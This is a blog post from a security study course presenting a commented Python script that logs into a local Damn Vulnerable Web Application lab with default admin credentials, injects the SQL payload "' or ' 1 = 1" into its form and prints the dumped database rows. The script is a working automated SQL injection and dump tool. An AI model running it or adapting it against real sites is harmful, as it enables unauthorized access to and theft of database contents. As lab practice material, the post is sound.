Showing posts with label Beautifulsoup. Show all posts
Showing posts with label Beautifulsoup. Show all posts

Sunday, February 24, 2013

SQLi with Python and DVWA: article 201304

Continuing on with my studies and practice of Python with the help of SecurityTube's SPSE course I am presenting below a Proof of Concept script for SQL Injection. They script is written in Python 2.7 and uses Mecahnize along with BeautifulSoup.  I ran the script against OWASP's Damn Vulnerable Web Application found on the Broken Web Apps VM.  I have commented the script the make it is self explanatory as possible

Here is a screen shot of the output:



Here is the script:

#!/usr/bin/python

#Bringing in mechanize and beautiful soup.  These are  installed separately from Python
import mechanize
from bs4 import BeautifulSoup

#Building the SQL injection
hotSQLinjection = "' or ' 1 = 1"

#Creating a mechanize browser
browser = mechanize.Browser()

#Opening my URI to the DVWA web page obviously your location will most likely vary
browser.open("http://192.168.1.152/dvwa")

#Printing to browser title to show where I am
print "#" *55
print "# " + browser.title()
print "#" *55 + "\n"

#There is only one form on this page so I jump right in
browser.select_form(nr=0)


#Below I am filling out the form fields and submitting for log in
browser.form['username'] = 'admin'
browser.form['password'] = 'admin'
browser.submit()

#Again printing the browser title to show where I am
print "#" *55
print "# " + browser.title()
print "#" *55

#Now that I am authenticated I am opening the browser to the SQL Injection page
browser.open("http://192.168.1.152/dvwa/vulnerabilities/sqli")

#Again there is only one form so I am so I will jump right in

#Printing out what the SQLi is
print "\n"
print "#" *55
print "# " + " The SQL Injection that will be used is: " + hotSQLinjection
print "# " + " Injecting now"
print "#" *55

#Inserting the SQL Injection into the form filed and submitting
browser.select_form(nr=0)
browser.form['id'] = hotSQLinjection
browser.submit()

#This feeds the the browser page into a variable to feed into the BeautifulSoup parser
page1 =  browser.response().read()

#As it says!
print "\n"
print "#" *55
print "# " + " Feeding page into BeautifulSoup LXML Parser"
print "#" *55

soup1 = BeautifulSoup(page1, "lxml")

#The "sensitive" info from the injection is surrounded by 
 tags
#This creates a list to iterate though
allPRE =  soup1.find_all('pre')

#Printing out the "sensitve" information from the DVWA database
print "\n"
print "#" *55
print "# " + " Dump of database"
print "#" *55

#Iterating through the list
for pre in allPRE:
    print pre

#All done
print "\n"
print "#" *55
print "# " + " Injection and dump complete"
print "#" *55
print "\n"
Posted by at 7 comments:
Labels: , ,
Subscribe to: Posts (Atom)